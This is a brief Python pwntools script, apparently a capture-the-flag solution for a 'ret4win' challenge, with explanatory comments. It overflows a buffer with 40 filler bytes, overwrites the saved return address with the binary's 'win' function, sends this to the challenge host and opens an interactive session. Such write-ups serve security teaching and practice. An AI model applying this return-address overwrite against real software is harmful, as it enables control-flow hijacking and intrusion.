Ret4win

#!/usr/bin/env python3

from pwn import *
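# Target selection is left to pwntools' command-line arguments: running the
# script with a trailing LOCAL makes args.LOCAL truthy, and omitting it keeps
# the default (remote) behaviour. The earlier unconditional
# `args.LOCAL = False` overrode that switch and left the local branch in
# conn() unreachable.

# Path to the local copy of the challenge binary (specific to the author's
# machine).
LocalBin = "/Buckeye/PWN/ret4win/chall"

# Parse the local binary so its symbols can be looked up by name.
exe = ELF(LocalBin)

# ROP helper built over the same binary; nothing in the visible script uses it.
ropex = ROP(exe)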


def conn():
    """Return a pwntools tube connected to the challenge.

    A truthy ``args.LOCAL`` starts the binary at ``LocalBin`` as a local
    process. Otherwise a TCP connection to the hosted challenge service
    is opened.
    """
    if not args.LOCAL:
        return remote("pwn.chall.pwnoh.io", 13379)
    return process(LocalBin)

# Open the tube selected by conn().
r = conn()

# 40 filler bytes. Presumably this is the distance from the start of the
# overflowed buffer to the saved return address; the page does not show how
# the value was derived.
OFFSET = b'A' * 40

# Address of `win`, read from the local ELF and packed as a 64-bit value.
# NOTE(review): this address and the constant below come from the local copy,
# so the script assumes the service runs the same build at a fixed load
# address (i.e. not position-independent) - confirm against the binary.
WIN = p64(exe.symbols['win'])

# Layout: filler, then the address of win, then one more 8-byte word. The page
# does not say what 0x401245 points to; it sits where win's own return address
# would be read from.
payload = b"".join((OFFSET, WIN, p64(0x0000000000401245)))

# Wait for the program's prompt text, then send the payload followed by a
# newline.
r.sendlineafter(b'**beep**', payload)

# Hand the tube over to the terminal.
r.interactive()
